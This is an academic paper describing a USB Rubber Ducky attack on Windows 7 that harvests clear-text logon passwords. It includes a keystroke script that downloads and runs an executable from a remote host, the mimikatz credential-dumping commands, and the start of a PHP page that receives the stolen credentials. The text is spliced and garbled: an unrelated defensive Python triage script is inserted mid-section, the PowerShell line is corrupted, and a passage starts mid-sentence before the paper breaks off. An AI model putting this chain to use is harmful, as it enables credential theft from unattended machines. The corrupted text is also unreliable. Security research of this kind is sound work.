Hacking Experiment Using USB Rubber Ducky Scripting


Proceedings of The 8th International Multi-Conference on Complexity, Informatics and Cybernetics (IMCIC 2017)

Benjamin Cannoles
Department of CSIS
University of North Georgia
Dahlonega, GA 30005, USA
Brcann3389@ung.edu

and

Ahmad Ghafarian
Department of CSIS
University of North Georgia
Dahlonega, GA 30005, USA
Ahmad.ghafarian@ung.edu

ABSTRACT

Leaving your computer unlocked while you are away for seconds can give hackers all the time they need to obtain your personal information from your computer. This paper aims to detail the necessary research and development of a USB Rubber Ducky script and its implementation to obtain clear text logon id and passwords from a Windows machine, in mere seconds. Each stage is laid out discussing applications of Ducky script, powershell, mimikatz, and re-enabling the vulnerability. Details of the attack on Windows 7 operating systems and higher will be presented.

Keywords: USB Rubber Ducky, hacking, scripting, powershell, mimikatz, and duck tool kit.

1. INTRODUCTION

Nearly every computer, including desktops, laptops, tablets and smartphones, takes input from humans via keyboards. This is possible because there is a specification with every ubiquitous USB standard known as Human Interface Device (HID). Practically, this means that any USB device claiming to be a keyboard HID will be automatically detected and accepted by most modern operating systems including Windows, Mac OS, Linux or Android.

The USB interface is generally a dangerous vector for attack. In many organizations, use of USB flash drives is restricted [1] due to their potential for being used as a hacking tool or malware delivery. Examples of USB storage usages to serve as a malware delivery mechanism are provided in various research papers including [3, 7, 8, 9]. Recently an even more insidious form of USB-based attack has emerged known as BadUSB [2, 5]. The BadUSB device registers as multiple device types, allowing the device to take covert actions on the host machine. For example, a USB flash drive could register itself as a device or a keyboard, enabling the ability to inject malicious scripts. This functionality is present in the Rubber Ducky penetration testing tool [4].

Unfortunately, because USB device firmware cannot be scanned by the host machine, antivirus software cannot detect or defend against this attack. According to the authors in [10] this problem is not just limited to suspect flash drives. Any device that communicates over USB is susceptible to this kind of attack. Moreover, existing USB security solutions, such as white listing individual devices by their serial number, are not adequate when considering malicious firmware that can make spurious claims about its identity during device enumeration.

Standard USB devices are too simplistic to reliably authenticate. Similarly, secure devices with signed firmware that could permit authentication are rare, leaving it unclear how to defend ourselves against this new attack.

One can employ various approaches to penetrate a machine as a hacker or a penetration tester such as social engineering, exploiting vulnerabilities of the system, etc. One of the practical strategies used by the hackers is to plug in a USB stick to a machine. This can be done by using a USB device detected by a victim's computer as a HID (this is called BadUSB) and running the code without the knowledge or consent of the victim. For example, if the user is away for lunch and left his or her computer unattended, the hacker can plug in the USB in the victim’s machine for malicious purposes.

Several attempts have been made by researchers to mitigate the dangers of hacking to a machine via BadUSB. One of such methods is provided by Vouteva [14]. The author provided a proof of concept for the feasibility and deployment of BadUSB by using an Arduino Micro [15] as a replacement for a BadUSB.

In this paper, we present the details of our approach in implementing the penetration into a Windows machine via USB Rubber Ducky and scripting. The mechanism allows a hacker to attack an unattended machine and retrieve sensitive information such as user identification and clear text password from the victim machine. We will utilize several tools and technologies such as powershell, mimikatz, scripting language, web server and Ducky toolkit NG.

The rest of this paper is organized as follows. In section 2 we review the literature. Section 3 covers keylogger enabled USB and other hacking mechanisms related to USB. The tools and technologies used in this research are described in section 4. Section 5 details the implementation of our attack method. The conclusion appears in section 7.

2. LITERATURE REVIEW

In this section we explain some of the previous research in both the areas of using USB as an attack vector and the mechanisms for preventing attacks related to USBs.

At Black Hat 2015, Nohl and Lell presented USB attack scenarios using a BadUSB [11]. The authors demonstrated that it is possible to use a USB to redirect the user's DNS queries to an attacker's DNS server. In a related work Kamkar [12] has shown a Teensy USB microcontroller, configured to install a backdoor and change the DNS settings of an unlocked machine.

Recently, another method of using a BadUSB has been developed by Nikhil Mittal (SamratAshok) in a tool called Kautilya [13]. The tool has functionality like information gathering and script executions which leads to hacking the victim machine.

With the aim of mitigating the risks posed by USBs, the authors in [16] built a BadUSB device and tested it in a controlled OS environment. Based on the results of their tests, they made recommendations on how to control the security of a machine. In another published research paper the authors exploited several USB features to establish a rogue HTTP channel used to leak data stored on the device's disk to an Internet back end [17].

To mitigate the dangers of using keylogger enabled USB, the authors in [18] built a method called USBWall with the aim of preventing an attack. The authors compared their USBWall with other commercially available antivirus products. In their controlled environment, they report that USBWall is comparable to commercial anti-virus software.

3. USB KEYLOGGING

Keylogger software has the capability to record every keystroke a user makes to a log file. It can record information such as user id, password, instant messages, and e-mail. Details of keylogger performance and whether they need administrative access to the target machine or not are discussed in [19]. In recent years there has been some hardware development that enhances the task of keylogging. In this section we describe the specification of one such piece of hardware that we use in this research.

The USB Rubber Ducky has been developed by Hak5 [4]. This USB key includes a 60MHz programmable microcontroller and an SD slot. It behaves like a keyboard and it looks like USB flash drives. It can be easily hidden on a computer’s device port. Another feature of this device is that it may be hidden in the task manager; it is assumed that its power consumption may be revealed by physical measurements. However, to use the USB Rubber Ducky we need physical access to the victim’s machine and we need to write a malware to be injected into the device.

Computers inherently trust devices that claim to be a HID. It’s through these devices that humans interact with and accomplish their daily tasks on all computers including desktops, laptops, tablets, and smart phones. The USB Rubber Ducky is a keyboard emulator disguised within a USB thumb drive case. It has been used by IT professionals, penetration testers and hackers since 2010 and has become the most widely used commercial keystroke injection attack platform in the business. Combined with its scripting language, malware payloads can be written and deployed.

Many people leave their computers unattended, even if only for a few minutes. These few minutes are all it takes for personal information to be stolen from the victim’s machine by a malicious hacker using the USB Rubber Ducky or a similar device. Whether it is a local account or a Microsoft account, vulnerability exists in Windows and many other operating systems. Clear text passwords are stored in the computer’s main memory that can be extracted using a program called Mimikatz designed by Benjamin Delpy [22]. One of the many functions included in mimikatz is the sekurlsa function, which specifically targets logon passwords and hashes.

This research exploits Windows vulnerability utilizing the USB Rubber Ducky. In this project the machine has windows defender for its antivirus. An account is created on the victim’s machine and all activities are targeting this account. In the next section we describe the details of the tools and technology needed to construct the malware payload and for launching an attack.

4. TOOLS AND TECHNOLOGIES

This section outlines the tools and technologies we used in this research project.

4.1 Victim’s Machine

For the victim machine we use a physical machine running Windows 7, 64-bits Ultimate Edition with all patches applied and having windows defender as the antivirus software.

4.2 USB Ducky Hardware

We used a USB Rubber Ducky for attack media (Hak5 [4]), this looks like a USB flash drive which can be plugged into the victim’s machine. The average USB Rubber Ducky includes a 60MHz programmable microcontroller and a SD slot. Some of the features of this device include behaving like a keyboard; it does not show in the task manager and its power consumption may be revealed by physical measurements.

4.3 Scripting Language

To write malware payload we use Rubber Ducky scripting language. Writing scripts can be done from any common text editor such as Notepad. Each command must be written on a new line all in caps, and may be followed by options. The commands can invoke keystrokes, key-combos or strings of text as well as offering delays or pauses. The two most common commands are DELAY and STRING. DELAY is followed by a number that represents milliseconds. For example, the line “DELAY 2000” instructs the Rubber Ducky to wait 2 full seconds before proceeding to the next line of code. This is extremely important in making sure the script runs smoothly and effectively. Since the Ducky is extremely fast, some computers may not be able to keep up. This command prevents the Ducky from moving faster than the computer will be able to follow. The STRING command instructs the Rubber Ducky to process the text following STRING. It can accept a single or multiple characters. Also, the command WINDOWS (or GUI) emulates the Windows-key. Figure 1 shows an example of a script [5] which displays Hello World! I am in your PC.
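
The command rules given in section 4.3 (one command per line, in caps, DELAY in milliseconds, STRING for typed text, GUI or WINDOWS for the Windows key) are enough for a defender to triage a payload text file recovered from a seized device without running it. The following Python is an added example, not code from the paper; the function names, the list of interpreters it flags and both sample scripts are assumptions constructed for illustration.

```python
"""Static triage of a recovered Ducky Script text payload (added example)."""
import re

# Interpreters whose launch from the Run dialog deserves an analyst's attention.
# This list is an assumption for the example, not taken from the paper.
SHELLS = re.compile(r"^\s*(powershell|cmd|wscript|cscript|mshta)\b", re.I)

def parse(script):
    """Yield (line_no, command, argument) for each non-blank, non-REM line."""
    for no, raw in enumerate(script.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("REM"):
            continue
        cmd, _, arg = line.partition(" ")
        yield no, cmd, arg

def triage(script):
    """Summarise what the script would type and flag Run-dialog shell launches."""
    report = {"delay_ms": 0, "typed": [], "findings": [], "errors": []}
    run_dialog_open = False
    for no, cmd, arg in parse(script):
        if cmd != cmd.upper():  # commands must be written in caps
            report["errors"].append((no, f"command not in caps: {cmd}"))
            continue
        if cmd == "DELAY":
            if arg.isdigit():
                report["delay_ms"] += int(arg)
            else:
                report["errors"].append((no, f"bad DELAY value: {arg!r}"))
        elif cmd in ("GUI", "WINDOWS"):
            run_dialog_open = arg.strip().lower() == "r"  # Windows key + r
        elif cmd == "STRING":
            report["typed"].append(arg)
            if run_dialog_open and SHELLS.match(arg):
                report["findings"].append((no, "Run dialog launches " + arg.split()[0]))
            run_dialog_open = False
        elif cmd == "ENTER":
            run_dialog_open = False
    return report

# Constructed sample inputs (not the paper's figures).
BENIGN = ("DELAY 2000\nGUI r\nDELAY 500\nSTRING notepad\nENTER\n"
          "DELAY 1000\nSTRING Hello World! I am in your PC.\nENTER")
SUSPECT = "DELAY 3000\nGUI r\nDELAY 100\nSTRING powershell\nENTER\ndelay 5"

if __name__ == "__main__":
    for name, text in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, triage(text))
```

The summed DELAY values give a lower bound on how long the device needed to stay plugged in, which helps when correlating with badge or camera records.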

Figure 1 - An example of Rubber Script

4.4 Duck Toolkit NG

The Duck Toolkit NG is an open source penetration testing platform that allows users to generate USB Rubber Ducky [23] payloads for use on Windows, Linux, Mac OSX and many other popular operating systems. The Duck Toolkit NG allows us to use pre built payloads, create our own payloads and decode existing payloads. Using the toolkit requires administrative access, powershell, and Internet access.

4.5 Powershell

Powershell is an object-oriented programming language and interactive command line shell for Microsoft Windows. Powershell automates system tasks, such as batch processing, and creates systems management tools for commonly implemented processes. Figure 2 shows an example of powershell for downloading a file from a website and then executing it [6].

    DELAY 3000
    GUI r
    DELAY 100
    STRING powershell p://example.com/bob.old','%TEMP%\bob.exe');
    DELAY 100
    STRING Start-Process "%TEMP%\bob.exe"
    ENTER

Figure 2 - Example of a powershell code

4.6 Web Server

Since we are going to execute the malware remotely from the web, we need a web server with PHP capability to upload and download malware executable files.

a connection to the servers, then copy over sekurlsa.dll and run it. Mimikatz tools run on all versions of Windows from XP forward. However, its functionality is somewhat limited in Windows 10. Below is an example of Mimikatz statements that need to be executed in order to look for passwords on a system.

    privilege::debug
    Sekurlsa::logonpasswords

5. HACKING EXPERIMENT

This section details the process of exploiting Windows vulnerability by creating an attack payload for retrieving user id and password from the victim’s machine. For this project, the victim machine will be running Windows 7 with windows defender as its antivirus.

5.1 Using Ducky Script to Create Payload

We used Ducky scripting, which was introduced in section 4.3 and wrote our own malware script in a notepad and saved it as a text file. This text file was then encoded into an inject.bin file. The following statement converts the script text file to a .bin file.

    java -jar duckencode.jar -i payload.txt -o inject.bin

Once we created the inject.bin file, we injected it onto the microSD card which was then inserted in the USB Rubber Ducky hardware. At this point the Ducky is ready for the first part of the attack.

5.2 Configuring Mimikatz for File Upload/Download

The next step is to obtain a copy of the Mimikatz executable and upload to a hosting service of your choosing, or your own private webserver. For this project we chose a Google Drive account to upload the executable file. When the file was uploaded we utilized a direct link generator to obtain the download link for the mimikatz as this is how it will download and run from powershell. Uploading the credentials was a little more in-depth. We created a PHP (Figure 3) page on our website to listen to the file coming in, and then save it. This receives the file and saves it in the current directory of the PHP file, with the name of “Credentials VictimIPAddress CurrentDate mimikatz.log”.

    ?php uploadDir ‘Credentials’.” “. SERVER[‘REMOTE ADD’].” ”.date(“Y-m-d H-i-
